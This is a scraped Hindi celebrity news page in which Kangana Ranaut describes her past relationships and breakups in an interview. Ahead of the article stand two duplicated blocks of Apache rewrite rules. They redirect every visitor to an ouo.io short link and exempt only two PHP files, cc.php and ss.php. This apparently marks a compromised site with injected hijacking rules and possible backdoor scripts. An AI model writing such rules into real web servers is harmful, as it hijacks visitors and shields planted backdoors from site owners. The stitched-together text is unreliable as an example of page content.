
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 329
नई दिल्ली। कंगना रानौत का विवादों से गहरा नाता रहा है। वे हमेशा से ही सुखियों में रही हैं। इस बार उसने अपनी लवलाइफ का खुलासा कर एक बार फिर से अपने फैन्स को चौंका दिया है। जी हां, हाल ही में एक प्रोगाम के लिए दिल्ली पहुंचीं कंगना ने इंटरव्यू के दौरान अपनी लव लाइफ को लेकर शॉकिंग खुलासे किए हैं।
कंगना ने कहा कि हमेशा लोगों ने मुझे डम्प किया। मैंने कभी किसी को डम्प करने की कोशिश नहीं की। 16 से 31 तक उम्र में मेरी जिनती भी रिलेशनशिप रही है, इनमें से मैंने किसी को भी डम्प नहीं किया। हर बार मुझे ही नुकसान उठाना पड़ा है। कंगना ने कहा जितने लोगों ने भी मुझे धोखा दिया या छोड़ा वो लौटकर वापस मेरे पास आए, लेकिन मैंने इनमें से किसी को भी दोबारा नहीं अपनाया क्योंकि हर बार धोखा मिलने के बाद मैं लाइफ में आगे बढ़ी।
कंगना ने इंटरव्यू में कहा- मेरे कई सारे अफेयर्स रहे हैं। हर ब्रेकअप के बाद मुझे लगता था कि ये मेरी आखिरी लव लाइफ है। मेरे लिए प्यार फिजिकल रिलेशन बनाना नहीं बल्कि मेरे लिए प्यार आध्यात्म से जुड़ने का एक तरीका रहा है। इससे एक अमेजिंग एक्सपीरियंस होता है और लगता है कि बॉडी का हर सेल काम कर रहा है। फिर चाहे आपके आसपास कोई हो या न हो। बता दें कि कुछ वक्त ही पहले ही कंगना और ऋतिक के कथित अफेयर की खबरों ने बॉलीवुड में खलबली मचा दी थी। जिसे लेकर दोनों तरफ से कई शॉकिंग बयान सामने आए थे।